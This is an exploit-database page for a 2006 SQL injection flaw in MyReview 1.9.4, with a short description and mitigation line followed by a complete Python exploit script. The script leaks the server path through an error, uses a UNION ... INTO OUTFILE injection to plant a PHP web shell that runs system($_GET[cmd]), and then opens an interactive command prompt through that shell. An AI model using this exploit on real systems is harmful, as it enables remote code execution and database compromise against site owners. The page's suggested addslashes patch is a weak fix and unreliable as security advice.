header-logo
Suggest Exploit
vendor:
MyReview
by:
STILPU
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: MyReview
Affected Version From: 1.9.4
Affected Version To: 1.9.4
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

MyReview 1.9.4 SQL Injection exploit

MyReview 1.9.4 is vulnerable to SQL Injection due to the lack of input validation in the GetMember function in functions.php. An attacker can exploit this vulnerability to inject malicious SQL code into the application, allowing them to gain access to the database and potentially execute arbitrary code on the server. The vulnerability can be patched by adding '$email=addslashes(trim($email));' before the query and using something else, very buggy script.

Mitigation:

Input validation should be implemented to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# MyReview 1.9.4 SQL Injection exploit
#
#
# http://myreview.lri.fr/
#
# in functions.php starting from line 382
# ............	
#	function GetMember ($email, $db, $mode="array")
#	{
#  		$query = "SELECT * FROM PCMember WHERE email = '$email'" ;
#		result = $db->execRequete ($query);
# .......... 
# 
# $email is not checked before used into $query
# 
# for patch 
# 
# 1. add "$email=addslashes(trim($email));" before $query
# 2. use something else, very buggy script
#
# by STILPU (dmooray[a lu']gmail.com)
#


import httplib, urllib, re, urlparse, sys

def usage():
	print """
MyReview 1.9.4 SQL Injection exploit

Usage: python exploit.py http://target/pathtomyreview/

Requires warnings to be displayed so we cat get the localpath and FILES/ to be writable

by STILPU  (dmooray[a lu']gmail.com)

"""
	sys.exit(1)

def getlocalpath(server):
	params=urllib.urlencode({'email':'\'','motDePasse':'a','ident':'Log in'})
	headers={"Content-type": "application/x-www-form-urlencoded","Accept": "text/plain"}
	con = httplib.HTTPConnection(server)
	con.request("POST",path+"Admin.php",params,headers)
	resp=con.getresponse()
	data=resp.read()
	try:
		localpath=re.search('>/.*B',data[0:10000]).group().replace('>','',1).replace('B','',1)	
	except Exception: print "Exploit failed: didn`t manage to get localpath"; sys.exit(1)
	return localpath
	
def sendshell(server):
	shell="'<?php error_reporting(0); ini_set(\"max_execution_time\",0); system($_GET[cmd]); /*'"
	sql="' union select " + shell + ",0,0,0,'*/ ?>' into outfile '" +getlocalpath(server)+ "FILES/STILPU.php' from PCMember#"
	headers={"Content-type": "application/x-www-form-urlencoded","Accept": "text/plain"}
	params=urllib.urlencode({'email':sql,'motDePasse':'a','ident':'Log in'})
	con = httplib.HTTPConnection(server)
	con.request("POST",path+"Admin.php",params,headers)

def sendcmd(server):
	while 1:
		try:
			cmd=raw_input('sh$ ')
			cmd=cmd.replace(" ","+")
			con = httplib.HTTPConnection(target)
			con.request("GET",path+"FILES/STILPU.php?cmd="+cmd)
			resp=con.getresponse()
			data=resp.read()
			if (cmd=="exit" or cmd=="quit"): break
			print data
		except KeyboardInterrupt: break	


if __name__ == '__main__':

	if len(sys.argv) < 2:
		usage()		
	
	else:
		url = sys.argv[1]
		url = urlparse.urlsplit(url)
		target = url[1]
		path = url[2]
		
		sendshell(target)
		sendcmd(target)

# milw0rm.com [2006-09-19]

Navigation

Suggest Exploit

Services By CQR